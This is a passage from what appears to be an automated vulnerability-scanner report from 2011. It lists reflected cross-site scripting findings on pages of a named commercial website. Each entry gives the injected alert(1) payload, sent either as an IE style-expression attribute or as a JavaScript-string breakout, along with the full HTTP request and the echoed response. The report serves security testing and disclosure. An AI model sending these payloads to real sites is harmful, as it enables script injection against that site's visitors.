This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /about-us/company-information/online-policies/privacy-statement?6624b"style%3d"x%3aexpression(alert(1))"6dff94306a9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:44 GMT
Connection: close
Content-Length: 52934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/about-us/company-information/online-policies/privacy-statement?6624b"style="x:expression(alert(1))"6dff94306a9=1" />
...[SNIP]...

1.615. http://www.starbucks.com/about-us/company-information/online-policies/terms-of-use [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information/online-policies/terms-of-use

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 177c1"style%3d"x%3aexpression(alert(1))"405a7c3edc3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 177c1"style="x:expression(alert(1))"405a7c3edc3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /about-us/company-information/online-policies/terms-of-use?177c1"style%3d"x%3aexpression(alert(1))"405a7c3edc3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:21:24 GMT
Connection: close
Content-Length: 68896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/about-us/company-information/online-policies/terms-of-use?177c1"style="x:expression(alert(1))"405a7c3edc3=1" />
...[SNIP]...

1.616. http://www.starbucks.com/about-us/company-information/online-policies/web-accessibility [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information/online-policies/web-accessibility

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30cc8"style%3d"x%3aexpression(alert(1))"6c461a50f50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 30cc8"style="x:expression(alert(1))"6c461a50f50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /about-us/company-information/online-policies/web-accessibility?30cc8"style%3d"x%3aexpression(alert(1))"6c461a50f50=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:20 GMT
Connection: close
Content-Length: 39352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/about-us/company-information/online-policies/web-accessibility?30cc8"style="x:expression(alert(1))"6c461a50f50=1" />
...[SNIP]...

1.617. http://www.starbucks.com/about-us/company-information/product-advisories [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information/product-advisories

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cd5c"style%3d"x%3aexpression(alert(1))"3d37d7257db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4cd5c"style="x:expression(alert(1))"3d37d7257db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /about-us/company-information/product-advisories?4cd5c"style%3d"x%3aexpression(alert(1))"3d37d7257db=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:06 GMT
Connection: close
Content-Length: 38510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/about-us/company-information/product-advisories?4cd5c"style="x:expression(alert(1))"3d37d7257db=1" />
...[SNIP]...

1.618. http://www.starbucks.com/about-us/our-heritage [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/our-heritage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cfef"style%3d"x%3aexpression(alert(1))"1c51ac66bf6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5cfef"style="x:expression(alert(1))"1c51ac66bf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /about-us/our-heritage?5cfef"style%3d"x%3aexpression(alert(1))"1c51ac66bf6=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:04 GMT
Connection: close
Content-Length: 37603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/about-us/our-heritage?5cfef"style="x:expression(alert(1))"1c51ac66bf6=1" />
...[SNIP]...

1.619. http://www.starbucks.com/business [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /business

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8439b"style%3d"x%3aexpression(alert(1))"d1ac5f7cb9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8439b"style="x:expression(alert(1))"d1ac5f7cb9a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /business?8439b"style%3d"x%3aexpression(alert(1))"d1ac5f7cb9a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:27 GMT
Connection: close
Content-Length: 36606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/business?8439b"style="x:expression(alert(1))"d1ac5f7cb9a=1" />
...[SNIP]...

1.620. http://www.starbucks.com/business/foodservice [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /business/foodservice

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56659"style%3d"x%3aexpression(alert(1))"563fe89e48e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 56659"style="x:expression(alert(1))"563fe89e48e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /business/foodservice?56659"style%3d"x%3aexpression(alert(1))"563fe89e48e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:21:28 GMT
Connection: close
Content-Length: 35775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/business/foodservice?56659"style="x:expression(alert(1))"563fe89e48e=1" />
...[SNIP]...

1.621. http://www.starbucks.com/business/international-stores [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /business/international-stores

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45cc2"style%3d"x%3aexpression(alert(1))"db7f4597e3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45cc2"style="x:expression(alert(1))"db7f4597e3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /business/international-stores?45cc2"style%3d"x%3aexpression(alert(1))"db7f4597e3f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:21:12 GMT
Connection: close
Content-Length: 36211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/business/international-stores?45cc2"style="x:expression(alert(1))"db7f4597e3f=1" />
...[SNIP]...

1.622. http://www.starbucks.com/business/licensed-stores [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /business/licensed-stores

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4641a"style%3d"x%3aexpression(alert(1))"960dd899042 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4641a"style="x:expression(alert(1))"960dd899042 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /business/licensed-stores?4641a"style%3d"x%3aexpression(alert(1))"960dd899042=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:21:26 GMT
Connection: close
Content-Length: 35650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/business/licensed-stores?4641a"style="x:expression(alert(1))"960dd899042=1" />
...[SNIP]...

1.623. http://www.starbucks.com/business/office-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /business/office-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c588f"style%3d"x%3aexpression(alert(1))"7c2218a24c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c588f"style="x:expression(alert(1))"7c2218a24c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /business/office-coffee?c588f"style%3d"x%3aexpression(alert(1))"7c2218a24c5=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:44 GMT
Connection: close
Content-Length: 37633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/business/office-coffee?c588f"style="x:expression(alert(1))"7c2218a24c5=1" />
...[SNIP]...

1.624. http://www.starbucks.com/career-center [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd912"style%3d"x%3aexpression(alert(1))"c7bd23ee043 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cd912"style="x:expression(alert(1))"c7bd23ee043 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /career-center?cd912"style%3d"x%3aexpression(alert(1))"c7bd23ee043=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:22:13 GMT
Connection: close
Content-Length: 42847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/career-center?cd912"style="x:expression(alert(1))"c7bd23ee043=1" />
...[SNIP]...

1.625. http://www.starbucks.com/career-center [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c23fe"%3balert(1)//0dffb39826 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c23fe";alert(1)//0dffb39826 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /career-center?c23fe"%3balert(1)//0dffb39826=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:22:15 GMT
Connection: close
Content-Length: 42747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
ext/javascript">
   var flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "96759753001";
   flashvars.playerLocation = "http://www.starbucks.com/career-center?c23fe";alert(1)//0dffb39826=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

1.626. http://www.starbucks.com/career-center/career-diversity [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/career-diversity

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45639"style%3d"x%3aexpression(alert(1))"a3851b9f98e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45639"style="x:expression(alert(1))"a3851b9f98e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /career-center/career-diversity?45639"style%3d"x%3aexpression(alert(1))"a3851b9f98e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:24:02 GMT
Connection: close
Content-Length: 38646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/career-center/career-diversity?45639"style="x:expression(alert(1))"a3851b9f98e=1" />
...[SNIP]...

1.627. http://www.starbucks.com/career-center/career-diversity/partner-networks [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/career-diversity/partner-networks

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62b53"%3balert(1)//fc24e1787a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62b53";alert(1)//fc24e1787a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /career-center/career-diversity/partner-networks?62b53"%3balert(1)//fc24e1787a8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:24:21 GMT
Connection: close
Content-Length: 40731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
s = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "275225263001";
   flashvars.playerLocation = "http://www.starbucks.com/career-center/career-diversity/partner-networks?62b53";alert(1)//fc24e1787a8=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

1.628. http://www.starbucks.com/career-center/career-diversity/partner-networks [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/career-diversity/partner-networks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae7f1"style%3d"x%3aexpression(alert(1))"dbb34cb95f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ae7f1"style="x:expression(alert(1))"dbb34cb95f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /career-center/career-diversity/partner-networks?ae7f1"style%3d"x%3aexpression(alert(1))"dbb34cb95f4=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:24:17 GMT
Connection: close
Content-Length: 40826

